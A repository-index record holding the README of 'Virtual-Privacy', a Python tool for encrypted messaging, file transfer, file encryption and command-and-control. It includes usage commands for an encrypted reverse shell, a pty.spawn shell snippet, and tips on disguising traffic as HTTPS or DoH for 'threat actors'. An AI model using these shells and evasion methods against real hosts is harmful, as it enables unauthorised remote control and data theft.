{"id":15149943,"url":"https://github.com/0x00wolf/virtual-privacy","last_synced_at":"2025-04-09T11:26:37.517Z","repository":{"id":221613739,"uuid":"748473856","full_name":"0x00wolf/virtual-privacy","owner":"0x00wolf","description":"A Pythonic Swiss-Army knife for conducting covert communications over insecure networks, generating encrypted reverse-shells, file transfers, and secure data storage.","archived":false,"fork":false,"pushed_at":"2024-02-24T15:29:22.000Z","size":376,"stargazers_count":2,"open_issues_count":0,"forks_count":0,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-02-15T05:25:18.816Z","etag":null,"topics":["covert-channel","data-exfiltration","encrypt-folders","encrypted-files","encrypted-messages","encrypted-reverse-shells","encrypting-data","end-to-end-encryption","network-protocol","reverse-shell-generator","reverse-shells","secure-communication-protocol","secure-file-sharing"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/0x00wolf.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-01-26T03:25:22.000Z","updated_at":"2024-07-19T18:22:47.000Z","dependencies_parsed_at":"2024-02-09T02:11:36.104Z","dependency_job_id":"f321009c-5697-4eed-b3fa-8bf30ff5d578","html_url":"https://github.com/0x00wolf/virtual-privacy","commit_stats":{"total_commits":107,"total_committers":1,"mean_commits":107.0,"dds":0.0,"last_synced_commit":"500ffd0aee8b95ad5e382d744ff0fa3c80586fa5"},"previous_names":["0x00wolf/virtual-privacy"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x00wolf%2Fvirtual-privacy","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x00wolf%2Fvirtual-privacy/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x00wolf%2Fvirtual-privacy/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x00wolf%2Fvirtual-privacy/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/0x00wolf","download_url":"https://codeload.github.com/0x00wolf/virtual-privacy/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248029750,"owners_count":21036052,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["covert-channel","data-exfiltration","encrypt-folders","encrypted-files","encrypted-messages","encrypted-reverse-shells","encrypting-data","end-to-end-encryption","network-protocol","reverse-shell-generator","reverse-shells","secure-communication-protocol","secure-file-sharing"],"created_at":"2024-09-26T14:01:36.701Z","updated_at":"2025-04-09T11:26:37.480Z","avatar_url":"https://github.com/0x00wolf.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Virtual-Privacy\n\nVirtual-Privacy (VP) is a Pythonic Swiss army knife for conducting covert communications over insecure networks, and secure data storage. VP features 4 levels of encryption, 24 host iterations (command and control, file transfers, and a chatroom), and a number of options for generating credentials. VP additonally offers the ability to encrypt a file, directory, or an entire path recursively. VP features a unique network security protocol that emulates and incorporates popular protocols like SSH, PGP, and SSL. \n\nIt should be noted, the host operation, chat, is styled after AOL chat rooms circa 1999, but with the added feature of layered encryption to create a communication medium suitable for individuals working in contemporary spycraft.\n\n---\n\n## In this README.md:\n\nYou will find a comprehensive manual that will teach you how to use all of the easy features that the program offers to conduct covert communications, and encryted data storage!\n\n\n---\n\n\n## Index:\n\n1) [Installation](#installation)\n2) [Host Operations](#host-operations)\n3) [Levels of Encryption](#levels-of-encryption)\n4) [Generate Credentials](#generate-credentials)\n5) [Database Operations](#database-operations)\n6) [Encryption \u0026 Decryption](#encryption_and_decryption)\n\n\n---\n\n## Installation\n\nVP uses one non-standard Python library, `pycryptodome`. \n\nVP also requires OpenSSL.\n\n**To install Virtual-Privacy:**\n\n1) Download Virtual-Privacy:\n\n```bash\ngit clone https://github.com/0x00wolf/virtual-privacy\n```\n\n2) Navigate to the parent directory:\n\n```bash\ncd ./virtual-privacy\n```\n\n3) Create a virtual environment, activate it, and install pycryptodome:\n\n```bash\npython -m venv venv \u0026\u0026 source ./venv/bin/activate \u0026\u0026 pip install pycryptodome\n```\n\n4) Generate some credentials, throw some reverse shells, and have fun!\n\n**At runtime:** The program will check to see if the following directories exist in the program's parent directory or it will generate them: ./keys/local, ./keys/remote, and ./data. The program uses the runtime `--user` | `-u` argument to select the SQL database to use, allowing users to create multiple databases for different purposes by simply creating a new user key. See [user](#user) for more information.\n\n---\n\n\n## Host Operations\n\n`--server` | `-s` \u0026 `--client` | `-c`\n\nBoth client and server operating modes feature 12 iterations on 3 host \narchetypes: Command \u0026 Control (c2), File Transfers (ftp), \u0026 Chatroom (chat).\n\nEach operating mode has 4 variations, relative to the different encryption \nlevels VP offers. The user simply needs to supply the required credentials \nfor the desired operating mode, and VP will select the correct host at \nruntime. For more information on VP's encryption options, see: \n[VP Encryption Options](#vp-encryption-options). \n\nRequired Args:\n- Mode: `--client OPERATION` | `-c OPERATION` or `--server OPERATION` | `-s OPERATION`\n\nOperations:\n- `c2`: See [c2](#c2)\n- `ftp`: See [ftp](#ftp)\n- `chat`: See [chat](#chat)\n\nOptional Sever Args:\n- `--host` | `-ip`: Hostname or IPv4 address. Defaults to loopback for testing, `127.0.0.1`.\n- `--port` | `-p`: Port number. Defaults to 1337.\n- `--only-ssl` | `-os`: Required for the server to use SSL without VPP. See: [Levels of Encryption](#levels-of-encryption)\n- `--user` | `-u`: Generate a new, or reference an existing, SQL database. See: [user](#user)\n- `--private-key` | `-pr`: Path to the user's RSA private key.\n- `--certificate` | `-crt`: Path to the server's signed x509 certificate.\n\nOptional Client Args:\n- `--host` | `-ip`: Hostname or IPv4 address. Defaults to loopback for testing, `127.0.0.1`.\n- `--port` | `-p`: Port number. Defaults to 1337.\n- `--only-ssl` | `-os`: Required for the server to use SSL without VPP. See: [Levels of Encryption](#levels-of-encryption)\n- `--user` | `-u`: Generate a new, or reference an existing, SQL database. See: [user](#user)\n- `--private-key` | `-pr`: Path to the user's RSA private key.\n- `--public-key` | `-pu`: Path to the remote server's RSA public key. \n- `--certificate` | `-crt`: Path to the server's signed x509 certificate.\n- `--target` | `-t`: Sets the saved parameters for `target` server nickname.\n\nBasic Usage:\n\n```bash\n# Long form:\npython vp.py --server OPERATION\npython vp.py --client OPERATION\n\n# Short form:\npython vp.py -s c2\npython vp.py -c c2\n```\n\n---\n\n### **c2**\n\n`python vp.py --server c2`\n\nVP's Command \u0026 Control mode sends a Pythonic reverse shell from the client \nto the server:\n\n`subprocess.Popen['python', '-i', ,'import pty', 'pty.spawn('/bin/bash')]` \n\nThe client runs the shell in a subprocess and uses Pipes to funnel the stdin, stdout \u0026 \nstderr over the network connection, allowing VP to encrypt the data streams \nin the process. VP uses multithreading, pipes, and queues to create a \nsmooth reverse shell experience, while encrypting data in transit.  \n\n\n---\n\n\n### ftp\n\n`python vp.py --client ftp`\n\nVP's ftp transfers allow for secure data transfer. Alternatively, you can \nuse VP's file encryption to encrypt a file in advance of transfer so that \nonly the intended recipient will be able to decrypt it. Pairing file \nencryption with secure data transmission makes for a very high degree of \nsecurity.\n\n\n---\n\n\n### chat\n\n`python vp.py -s chat`\n\nVP's Chat is styled after an AOL chatroom from 1999, but with heavy layers of modern encryption. \n\nAfter a client connects, the server will decrypt messages from each client, and then broadcast them to every connected client, encrypting each with their respective credentials (depending on the encryption level in use). The chatroom uses multithreading, and is conceieably capable of handling hundreds if not thousands of concurrent hosts, although that isn't very secretive. \n\nThe Chatroom was the initial inspiration for this project. I thought it would be funny to create an AOL chatroom that would be suitable for high level threat actors. A lot of my projects begin this way. I had a silly idea that I started to build, and then realized cool things I could make it do.\n\n\n---\n\n\n## Levels of Encryption\n\n1) [Base64](#base64)\n2) [SSL](#ssl)\n3) [VPP](#vpp)\n4) [SSL and VPP](#vpp_and_ssl)\n\n\n---\n\n\n## Base64\n\nBy default all communications are encoded with Base64. Although this \ndoesn't provide confidentially, integrity, or authenticity, it provides a \nbase layer of obfuscation to communications, which is often used by threat \nactors while acquiring a foothold on a new network.\n\n**Leve 1: Base64 examples**\n\nServer-side:\n\n```bash\n# Server-side long form:\npython vp.py --server c2 --host 0.0.0.0 --port 1337\n\n# Server-side short form:\npython vp.py -s c2 -ip 0.0.0.0 -p 1337\n```\n\n\nClient-side:\n\n```bash\n# Client-side long form:\npython vp.py --client c2 --host 192.168.2.15 --port 1337\n\n# Client-side short form:\npython vp.py -c c2 -ip 192.168.2.15 -p 1337\n```\n\n---\n\n\n### SSL\n\nVP's second level of encryption allows users to encrypt communications with \nTLSv1.3. SSL provides end-to-end encryption, alternatively, it also enables \nusers to mask their communications as regular traffic, particularly if they \nutilize a common port like 443, or 853 for the server connection, which \nwould make traffic look like HTTPs, DoT, or DoH.\n\nSee [Generate Credentials](#generate-credentials) for VP's built in options \nfor producing the required credentials. Fast-gen, [fast-gen](#fast-gen), in particular, will \nimmediately spit out everything you need.\n\n\n**Server args:**\n- `--private-key` | `-pr`: The RSA private key used to either self-sign the x509 certificate, or create the certificate signing request signed by a root CA.\n- `--certificate` | `-crt`: The signed x509 certificate\n- `--only-ssl` | `-os`: VPP \u0026 SSL have the same requirements for credentials, so this argument is necessary to inform VP to only use SSL. \n\n**Client args:**\n- `--certificate` | `crt`: Either the root CA signed certificate, or a server self-signed certificate.\n\n**Level 2: SSL examples**\n\nServer-side:\n\n```bash\n# Server-side long form:\npython vp.py --server c2 --host 0.0.0.0 --port 1337 --private-key ./key.pem --certificate ./cert.crt --only-ssl\n\n# Server-side short form:\npython vp.py -s c2 -ip 0.0.0.0 -p 1337 -pr ./key.pem -crt ./cert. -os\n```\n\nClient-side:\n\n```bash\n# Client-side short form:\npython vp.py --client c2 --host 192.168.2.15 --port 1337 --certificate ./cert.crt\n\n# Client-side short form:\npython vp.py -c c2 -ip 192.168.2.15 -p 1337 -crt ./cert.crt\n```\n\n\n---\n\n\n## VPP\n\nThe Virtual Privacy Protocol provides authenticity, confidentiality, and \nintegrity. It utilizes hybrid encryption, and signature verification for each transmission. VPP requires that both parties have exchanged RSA public keys in advance. The server administrator must register the remote user's public key in the runtime SQL database in advance of the client connecting. See [Database Operations](#database_operations), specifically [add-key](#add_key). The client has to provide the server's RSA public key as a runtime argument. \nFor detailed information on generating an RSA keypair, see [Generate Credentials](#generate-credentials).\n\nVPP authentication works as follows:\n\n**Client-side:**\n\n1) The client’s plaintext RSA public key is signed using their private key.\n2) The Client’s plaintext public key is encrypted with a new 256-bit session key.\n3) The session key is wrapped with the server’s RSA public key.\n4) The wrapped session key is transmitted to the server.\n\n**Server-side:**\n\n1) The server accepts a buffer containing the wrapped key \u0026 VP’s protocol header and attempts to unwrap the key.\n2) If the key was unwrapped, the server accepts a buffer of a size relative to information provided by the protocol header.\n3) The server slices off the first 384 bytes of the payload (the signature), and attempts to decrypt the remainder with the unwrapped key.\n4) The server verifies the contents of the decrypted message are a known RSA public key in the runtime SQL database.\n5) The server verifies that the signature belongs to the owner of the known key.\n\n**After authentication:**\n\nThe client and server continue to use the same steps, however, the composition of the messages changes somewhat. Both client and server prepare a payload of containing the ciphertext data, a signature of the data unencrypted, and the wrapped key. A 16 byte fixed length protocol header is transmitted first, which contains a binary string, representing the payload's length in bytes. The receiver than accepts a buffer of that size, and goes about the decryption process. The chat server doesn't limit the total size of packets, however both the reverse shell and FTP will transmit in chunks behind the scenes if the ciphertext exceeds a certain length.\n\nFor more information on VPP, see: [vpp](#vpp)\n\nTo generate credentials for VPP, see: [rsa](#rsa)\n\n**Server args:**\n- `--private-key` | `-pr`: The server's RSA private key\n- Clients added to the runtime SQL database: [add-key](#add_key)\n\n**Client args:**\n- `--private-key` | `-pr`: The client's RSA private key.\n- `--public-key` | `-pu`: The server's RSA public key.\n\n**Level 3: VPP Examples**\n\nServer-side:\n\n```bash\n# Server-side long form:\npython vp.py --server c2 --host 0.0.0.0 --port 1337 --private-key ./server_privkey.pem\n\n# Server-side short form:\npython vp.py -s c2 -ip 0.0.0.0 -p 1337 -pr ./server_privkey.pem\n```\n\nClient-side:\n\n```bash\n# Client-side short form:\npython vp.py --client c2 --host 192.168.2.15 --port 1337 --private-key ./my_privkey.pem --public-key ./server_pubkey.pem\n\n# Client-side short form:\npython vp.py -c c2 -ip 192.168.2.15 -p 1337 -pr ./my_privkey.pem -pu ./server_pubkey.pem\n```\n\n\n---\n\n\n## SSL and VPP\n\nVPP wrapped in TLSv1.3 for obfuscation and robust security. \n\n**Server args:**\n- `--private-key` | `-pr`: The path to the server's RSA private key\n- `--certificate` | `-crt`: The path to the server's signed x509 certificate.\n- The RSA public keys of remote clients added to the runtime SQL database, see: [add-key](#add_key)\n\n**Level 4: VPP \u0026 SSL Examples**\n\nServer-side:\n\n```bash\n# Server-side long form:\npython vp.py --server c2 --host 0.0.0.0 --port 1337 --private-key ./keys/local/srvr_privkey.pem --certificate ./cert.crt\n\n# Server-side short form:\npython vp.py -s c2 -ip 0.0.0.0 -p 1337 -pr ./keys/local/srvr_privkey.pem -crt ./cert.\n```\n\nClient-side:\n\n```bash\n# Client-side short form:\npython vp.py --client c2 --host 192.168.2.15 --port 1337 --private-key ./keys/local/my_privkey.pem --public-key ./keys/remote/srvr_pubkey.pem --certificate ./cert.crt\n\n# Client-side short form:\npython vp.py -c c2 -ip 192.168.2.15 -p 1337 -pr ./keys/local/my_privkey.pem -pu ./keys/remote/srvr_pubkey.pem -crt ./cert.crt\n```\n\n\n---\n\n\n## Generate Credentials\n\nCredential operations can be accessed via the generate-pki runtime argument:\n\n```bash\n# long form\npython vp.py --generate-pki [OPERATION]\n\n# short form\npython vp.py -pki [OPERATION]\n```\n\nVP provides four options for users to generate credentials. The first option \nuses pycryptodome to generate an RSA key pair, including \noptional private key encryption using best practices. The remaining three \noptions are wrappers for OpenSSL, which allow VP users to credentials for \nSSL on the fly, or establish more in depth PKI, including a root \nCertificate Authority. \n\n1) [rsa](#rsa)\n2) [self-sign](#self-sign)\n3) [fast-gen](#fast-gen)\n4) [root-ca](#root-ca)\n\n\n---\n\n\n### rsa\n\n`rsa`\n\nThis function allows the user to generate a new RSA keypair, with optional \npassword encryption. \n\nNote: Both optional arguments must be supplied for the program to accept \nthem.\n\nOptional Args:\n- `--private-key` | `-pr`: Supply the export path for the private key in advance\n- `--public-key` | `-pu`: Suppy the export path for the public key in advance.\n\n```bash\n\n# Long form:\npython vp.py --generate-pki rsa\n\n# Short form\npython vp.py -pki rsa\n\n# Optional, supply export paths in advance: \npython vp.py -pki rsa --private-key ./keys/local/my_privkey.pem --public-key  ./keys/local/my_pubkey.pem\n```\n\n\n---\n\n\n### self-sign\n\n`self-sign` | `ss`\n\nThis operation takes a preexisting RSA private key and uses it to produce a \nself-signed x509 certificate for establishing SSL. \n\nArgs:\n- `--private-key` | `-pr`: Path to an RSA private key\n\nOptional args:\n- `--certificate` | `-crt`: Optional export path for the signed x509 \ncertificate. \n\nDefault export path: \n- `-crt ./cert.crt`\n\n```bash\n# Long form:\npython vp.py --generate-pki self-sign --private-key ./keys/local/srvr_privkey.pem  \n\n# Short form:\npython vp.py -pki ss -pr ./local/srvr_privkey.pem\n\n# With an optional export path for the certificate\npython vp.py -pki ss -pr ./keys/local/srvr_privkey.pem --certificate ./keys/local/srvr_cert.crt\n```\n\n\n---\n\n\n### **fast-gen**\n\n`fast-gen` | `fg`\n\nThis operation instantly spits out the necessary credentials for \nestablishing a SSL encrypted connection, a new RSA private key and signed \nx509 certificate.\n\nOptional args:\n- `--private-key` | `-pr`: The export path for the RSA private key.\n- `--certificate` | `-crt`: The export path for the signed certificate.\n\nDefaults:\n- `-pr ./key.pem -crt ./cert.crt`\n\n```bash\n# Long form:\npython vp.py --generate-pki fast-gen\n\n# Short form:\npython vp.py -pki fg\n\n```\n\n\n---\n\n\n### **root-ca**\n\n`root-ca` | `ca`\n\nThe `root-ca` operation allows users to interactively generate public \nkey infrastructure. The output from this operation includes creating a root \nCertificate Authority, a server RSA keypair, and a CA signed certificate \nfor the server.\n\nTakes no args.\n\n```bash\n# Long form:\npython vp.py --generate-pki root-ca\n\n# Short form:\npython vp.py -pki ca\n```\n\n\n---\n\n\n## Encryption and Decryption\n\n`--encrypt [OPERATION]` | `-e [OPERATION]` \n\u0026 `--decrypt [OPERATION]` | `-d [OPERATION]`\n\nVP features the ability to encrypt or decrypt files, a single directory non-recursively, or a path recursively. You can also add signature authentication into the encryption process. You can additonally sign files as you encrypt them, allowing for additional layers of encryption and authenticity for files hosted with VP's `--server ftp` host operation.\n\n1) [file](#file)\n2) [dir](#dir)\n3) [path](#path)\n\n\n---\n\n\n### file\n\n`file`\n\nVP's file encryption option is useful for remote data transfer. The encryption process is very similar to the VP protocol, with the exception that the wrapped key (and optional RSA signature) are prepended to the file. During [Decryption](#Decryption) they are sliced off and used in the same sequence as described in [VPP](#VPP). \n\nEncryption Required Args:\n- `--file-in` | `-fi`: The file to be encrypted.\n- `--public-key` | `-pu`: The RSA public key of the individual who will decrypt the file.\n\nDecryption required args:\n- `--file-in` | `-fi`: The file to be decrypted.\n- `--private-key` | `-pr`: The matching RSA private key to the public key used for encryption. Used to decrypt the files with VPP.\n\nOptional args:\n- `--file-out` | `-fo`: An optional export path. Note that by using a non-default path, the original unencrypted file will remain in it's original location after encryption.\n- `--private-key` | `-pr`: Optional RSA private key to include signature verification in the encryption process.\n- `--public-key` | `-pu`: The RSA public key to verify the signature, if necessary. If signature verification was used, decryption will failwithout the provided public key, unless you change the code for `crypter.decrypt.signed_file()`.\n\nEncryption examples:\n\n```bash\n# Encryption long form:\npython vp.py --encrypt file --public-key ./keys/remote/Bobcat_public.pem --file-in ./secretmessage.txt\n\n# Encryption short form:\npython vp.py -e f -pu ./keys/remote/Bobcat_public.pem -fi ./secretmessage.txt\n\n# Encryption short form with optional file out and signature authentication:\npython vp.py -e f -pu ./keys/remote/Bobcat_public.pem -pr ./keys/local/my_privkey.pem -fi ./secretmessage.txt -fo ./secret4bobcat.enc\n```\n\nDecryption examples:\n\n```bash\n# Decrypt long form:\npython vp.py --decrypt file --private-key ./keys/local/my_privkey.pem -fi ./path/to/secret4bobcat.enc\n\n# Decrypt short form:\npython vp.py -d f -pr ./keys/local/my_privkey.pem -fi ./path/to/secret4bobcat.enc\n\n# Decrypt short form with optional RSA signature verification and a non default export path:\npython vp.py -d f -pr ./keys/local/my_privkey.pem -fi ./path/to/secret4bobcat.enc -pu ./keys/remote/jedi_public.pem -fo ./unencryptedsecret4me.txt\n```\n\n\n---\n\n\n### dir\n\n`dir`\n\nEncrypt a directory, without encrypting files found in any subdirectories. Optional RSA signature authentcation is available, but simply due to the fact the same function works behind the scenes to encrypt data. Logically, this operation is a tool for local secure data storage, along with the `path` operation. Other operating modes have equal utility for secure file transfers. Note that any file within an encrypted directory or path can be unencrypted with the `--decrypt file` operation ([decrypt file](#decrypt-file)).\n\n\nRequired Args:\n- `--file-in` | `-fi`: The path to the directory that will be encrypted.\n- `--public-key` | `-pu`: The RSA public key of the individual who will decrypt the directory.\n\nOptional args:\n- `--private-key` | `-pr`: Optional RSA private key to include signature verification in the encryption process.\n\nEncryption examples:\n\n```bash\n# Long form:\npython vp.py --encrypt dir --public-key ./keys/local/my_pubkey.pem --file-in /path/to/secrets_directory\n\n# Short form:\npython vp.py -e d -pu ./keys/local/my_pubkey.pem -fi ./path/to/secrets_directory\n```\n\nDecryption examples:\n\n```bash\n# Decrypt long form:\npython vp.py --decrypt dir --private-key ./keys/local/my_privkey.pem -fi ./path/to/encrypted_dir\n\n# Decrypt short form:\npython vp.py -d d -pr ./keys/local/my_privkey.pem -fi ./path/to/encrypted_dir\n```\n\n\n---\n\n\n### path\n\n`path`\n\nEncrypt a path, recursively encrypting files found in any subdirectories. Optional RSA signature authentcation is available, but simply due to the fact the same function works behind the scenes to encrypt data. Logically, this operation is a tool for secure local data storage, alongwith the following operation, `dir`. Note that any file within an encrypted directory or path can be unencrypted with the `--decrypt file` operation ([file](#file)).\n\n\nRequired Args:\n- `--file-in` | `-fi`: The path that will be encrypted.\n- `--public-key` | `-pu`: The RSA public key belonging to the individual who will decrypt the path.\n\nOptional args:\n- `--private-key` | `-pr`: Optional RSA private key to include signature verification in the encryption process.\n\nEncryption examples:\n\n```bash\n# Encrypt long form:\npython vp.py --encrypt path --public-key ./keys/local/my_pubkey.pem --file-in /path/to/secrets_path\n\n# Encypt short form:\npython vp.py -e p -pu ./keys/local/my_pubkey.pem -fi ./path/to/secrets_path\n```\n\nDecryption examples:\n\n```bash\n# Decrypt long form:\npython vp.py --decrypt path --private-key ./keys/local/my_privkey.pem -fi ./path/to/encrypted_path\n\n# Decrypt short form:\npython vp.py -d p -pr ./keys/local/my_privkey.pem -fi ./path/to/encrypted_path\n```\n\n\n---\n\n\n## Database Operations\n\n`--database` | `db`\n\nVP is backed by a SQLite3 database, which will be generated at runtime if not found by the program. VPP requires that remote client's RSA public keys be added to the runtime SQL database. Beyond simply using the public keys for hybrid encryption, VPP uses the keys for authentication.\n\n1) [user](#user)\n2) [target](#target)\n3) [add-key](#add-key)\n4) [show-key](#show-key)\n5) [show-keys](#show-keys)\n6) [delete-key](#delete-key)\n7) [add-target](#add-target)\n8) [show-target](#show-target)\n9) [show-targets](#show-targets)\n10) [delete-target](#delete-target)\n11) [show-tables](#show-tables)\n\n\n---\n\n\n### user\n\n`--user` | `-u`\n\nSet the SQL database name key at runtime to initialize a new database, or reference a pre-existing database. The `--user` argument can be used with the server and client mode to reference a particular databse. The primary use case here is if you want to establish different runtime databases to limit external clients whose public keys you have added from connecting to a specific server instance. \n\nSaves the database to the data directory, found within VP's parent folder.\n\nExample:\n\n```bash\n# Long form:\npython vp.py --database --user Jedi\n```\n\n\n---\n\n\n### target\n\n`--target` | `-t`\n\nThis runtime argument, like `--user`, can be used with multiple operating modes. For database operations it will be utilized to set nicknames when saving RSA public keys (optional) or the information to connect to remote servers (required).\n\n\n---\n\n\n\n### add-key\n\n`add-key`\n\nAdd a remote client's RSA public key to the runtime SQL database.\n\nRequired Args:\n- `--public-key` | `-pr`: The remote user's RSA public key.\n\nOptional Args:\n- `--target` | `-t`: Set a nickname for the public key.\n\nExample:\n\n```bash\n# Long form:\npython vp.py --database add-key --public-key ./keys/remote/bobcats_pubkey.pem --target Bobcat\n\n# Short form:\npython vp.py -db ak -pu ./keys/remote/bobcats_pubkey.pem -t Bobcat\n```\n\n\n---\n\n\n### show-key\n\n`show-key` | `sk`    \n\nShow a saved public key by ID or nickname.\n\nArgs:\n- `--target` | `-t`: The target nickname or ID number (shown at creation if no nickname is supplied).\n\nExample:\n\n```bash\n# Long form:\npython vp.py --database show-key --target Jedi\n\n# Short form:\npython vp.py -db sk -t Bobcat\n```\n\n\n---\n\n\n### show-keys\n\n`show-keys`\n\nDisplays information about all the stored keys.\n\n```bash\n# Long form:\npython vp.py --database show-keys\n\n# Short form:\npython vp.py -db show-keys\n```\n\n\n---\n\n\n### delete-key\n\n`delete-key`\n\nArgs:\n- `--target` | `-t`: The target nickname or ID number (shown at creation if no nickname is supplied).\n\nExample:\n\n```bash\n# Long form:\npython vp.py --database delete-key --target Bobcat\n\n# Short form:\npython vp.py -db sk -t Jedi\n```\n\n\n---\n\n\n### add-server\n\n`add-server` | `as`    \n\nSave connection information for a remote server in the SQL database. Use the `--target` option at runtime to initiailize the variables.\n\nArgs: \n- `--target` | `-t`: Server's nickname.\n- `--host` | `-ip`: The hostname or IPv4 address.\n- `--port` | `-p`: The port.\n\nOptional Args:\n- `--public-key` | `-pu`: The path to the server's public key. \n- `--certificate` | `-crt`: The path to the server's signed x509 certificate.\n\nExample:\n\n```bash\n# Long form:\npython vp.py --database add-server --target Jedi --host www.jedibuddy.com --port 1337 --public-key ./keys/remote/jedi_public.pem --certificate ./keys/remote/jedi_cert.crt\n\n# Short form:\npython vp.py -db as -t Jedi -ip www.jedibuddy.com -p 1337 -pu ./keys/remote/jedi_public.pem -crt ./keys/remote/jedi_cert.crt\n```\n\n\n---\n\n\n### show-server\n\n`show-server` | `ss`\n\nRequired Args: \n- `--target` | `-t`:  The target nickname.\n\nExample:\n\n```bash\n# Short form:\npython vp.py --database show-server --target Bobcat\n\n# Long form:\npython vp.py -db ss -t Bobcat\n```\n\n\n---\n\n\n### delete-server\n\n`delete-server`\n\nDeletes a target server based on a supplied `--target` nickname.\n\nArgs:\n- `--target` | `-t`: The target nickname.\n\nExample:\n\n```bash\n# Long form:\npython vp.py --database delete-key --target Bobcat\n\n# Short form:\npython vp.py -db sk -t Jedi\n```\n\n\n---\n\n\n### show-servers\n\n`show-servers`\n\nDisplays information about all the stored servers.\n\n```bash\n# Long form:\npython vp.py --database show-servers\n\n# Short form:\npython vp.py -db show-servers\n```\n\n\n---\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0x00wolf%2Fvirtual-privacy","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F0x00wolf%2Fvirtual-privacy","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0x00wolf%2Fvirtual-privacy/lists"}